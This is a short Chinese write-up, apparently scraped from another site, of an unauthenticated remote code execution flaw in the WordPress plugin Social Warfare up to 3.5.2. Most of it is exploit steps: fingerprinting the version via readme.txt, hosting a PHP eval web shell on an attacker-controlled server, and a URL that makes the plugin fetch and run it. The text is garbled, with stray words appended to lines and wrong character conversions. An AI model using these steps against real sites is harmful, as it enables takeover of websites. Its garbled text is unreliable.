WordPress插件Social Warfare<=3.5.2 無需登陸RCE漏洞

  該漏洞只存在於Social Warfare插進的3.5.03.5.13.5.2版本中,其餘版本不存在。php

  2019年3月21日插件做者緊急發佈了3.5.3版本以修復高危的RCE漏洞,在<=3.5.2版本中存在一處無需登陸便可getshell的RCE漏洞。shell

漏洞分析服務器

在/wp-content/plugins/social-warfare/lib/utilities/SWP_Database_Migration.php文件中有一處eval()函數,該函數將file_get_contents()讀取的文件內容當作PHP代碼執行致使RCE。函數

漏洞利用post

第一步:刺探是否安裝了Social Warfare插件url

訪問http://127.0.0.1/wp-content/plugins/social-warfare/readme.txt,若是存在readme.txt文件則說明已經安裝該插件,而且從該txt文件中可獲知插件的版本。spa

個人本機環境爲3.5.2版本。插件

第二步:在本身的VPS服務器上放置一個code.txt文件,並啓動HTTP服務使該文件可經過HTTP訪問。文件內容以下:debug

<pre>eval($_REQUEST['wpaa'])</pre>

 第三步:在未登錄任何帳號的狀況下直接訪問以下連接便可getshell。code

http://127.0.0.1//wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://your_ip/code.txt&wpaa=phpinfo();

相關文章
相關標籤/搜索